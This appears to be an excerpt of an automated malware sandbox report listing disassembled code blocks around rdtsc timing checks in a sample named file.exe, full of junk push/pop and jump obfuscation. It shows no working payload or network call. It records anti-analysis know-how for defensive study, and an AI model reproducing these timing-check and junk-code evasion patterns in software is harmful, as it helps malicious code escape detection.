                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E32 second address: ED3E87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAB30C06326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov di, dx 0x0000000f call 00007FAB30C06329h 0x00000014 js 00007FAB30C0632Eh 0x0000001a jl 00007FAB30C06328h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FAB30C0632Dh 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c jmp 00007FAB30C0632Ch 0x00000031 mov eax, dword ptr [eax] 0x00000033 push esi 0x00000034 push edi 0x00000035 pushad 0x00000036 popad 0x00000037 pop edi 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E87 second address: ED3E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E8B second address: ED3E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAB30C06326h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3FF7 second address: ED4029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30D3D44Dh 0x00000008 jmp 00007FAB30D3D454h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FAB30D3D448h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4368 second address: ED436C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AE7 second address: ED4AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AEB second address: ED4B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7A32 second address: ED7A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7AF4 second address: ED7B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAB30C0632Bh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAB30C06331h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7B1D second address: ED7B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA56A second address: EDA57C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FAB30C06338h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA2D6 second address: EDA2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAB30D3D44Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDA57C second address: EDA580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDCB1 second address: EDDCB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06DE second address: EE06E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06E2 second address: EE06F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE06F8 second address: EE0703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0703 second address: EE0716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAB30D3D446h 0x0000000a popad 0x0000000b jp 00007FAB30D3D44Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0879 second address: EE0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE357B second address: EE357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE357F second address: EE3583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45A1 second address: EE45CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jl 00007FAB30D3D44Ch 0x0000000e mov dword ptr [ebp+122D18BDh], esi 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D297Eh], eax 0x0000001c push 00000000h 0x0000001e add edi, 065835DBh 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jl 00007FAB30D3D44Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3762 second address: EE3768 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45CF second address: EE45D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45D7 second address: EE45DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE45DB second address: EE45DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE480D second address: EE4827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAB30C0632Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4827 second address: EE483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30D3D450h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB64E second address: EEB653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB653 second address: EEB6BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAB30D3D454h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAB30D3D448h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FAB30D3D448h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov di, si 0x00000047 push 00000000h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19F41 second address: F19F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A0B3 second address: F1A0BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A0BF second address: F1A0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30C06331h 0x00000008 jmp 00007FAB30C06337h 0x0000000d jmp 00007FAB30C0632Eh 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A52E second address: F1A536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AD53 second address: F1AD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AD5B second address: F1AD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0A8 second address: F1D0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0AC second address: F1D0CC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FAB30D3D448h 0x00000010 pushad 0x00000011 jmp 00007FAB30D3D44Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0CC second address: F1D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FAB30C0632Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FAB30C0632Ah 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBD3 second address: F1EBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBD9 second address: F1EBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBDF second address: F1EBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBE5 second address: F1EBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBEA second address: F1EC1A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAB30D3D463h 0x00000008 jmp 00007FAB30D3D457h 0x0000000d je 00007FAB30D3D446h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jbe 00007FAB30D3D44Eh 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F215EE second address: F215F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F215F2 second address: F215F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2174E second address: F21762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C0632Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21762 second address: F21774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAB30D3D44Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F218E1 second address: F218E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21A6A second address: F21A74 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BFC second address: F26C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FAB30C06328h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 jmp 00007FAB30C0632Eh 0x00000019 jg 00007FAB30C06326h 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25EBE second address: F25ED8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D44Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jnp 00007FAB30D3D446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F261E0 second address: F261F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06330h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F261F9 second address: F26213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D456h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26345 second address: F26362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06338h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26765 second address: F2676D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2676D second address: F26772 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2AF85 second address: F2AFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D459h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31AF3 second address: F31AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31F4B second address: F31F59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAB30D3D448h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31F59 second address: F31F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 pushad 0x00000008 jnc 00007FAB30C06326h 0x0000000e jbe 00007FAB30C06326h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AE69 second address: F3AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38F0A second address: F38F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A4A second address: F39A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39CC9 second address: F39CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAB30C06330h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39CEE second address: F39D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAB30D3D44Ah 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A2E7 second address: F3A316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007FAB30C06326h 0x00000013 jmp 00007FAB30C06331h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A316 second address: F3A31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A5C4 second address: F3A5CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB52 second address: F3AB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAB30D3D446h 0x0000000a jmp 00007FAB30D3D44Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB6F second address: F3AB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB75 second address: F3AB8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007FAB30D3D44Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB8E second address: F3AB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB98 second address: F3AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF81 second address: F3DF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF8C second address: F3DF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E0C1 second address: F3E0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E0D6 second address: F3E0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jno 00007FAB30D3D446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E230 second address: F3E236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E3CA second address: F3E3D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E3D0 second address: F3E3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30C06339h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F436C6 second address: F436E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FAB30D3D469h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FAB30D3D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97DA3 second address: E97DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97DA8 second address: E97DAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FAD second address: F46FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FAB30C06332h 0x0000000b jns 00007FAB30C06326h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FC0 second address: F46FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FC8 second address: F46FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FD9 second address: F46FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FAB30D3D461h 0x0000000d pushad 0x0000000e jl 00007FAB30D3D446h 0x00000014 jmp 00007FAB30D3D44Bh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA4B second address: F4EA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FAB30C06326h 0x0000000c jmp 00007FAB30C06339h 0x00000011 popad 0x00000012 jmp 00007FAB30C0632Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAB30C0632Fh 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA8E second address: F4EABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Fh 0x00000007 jmp 00007FAB30D3D458h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EABD second address: F4EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAC3 second address: F4EAC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
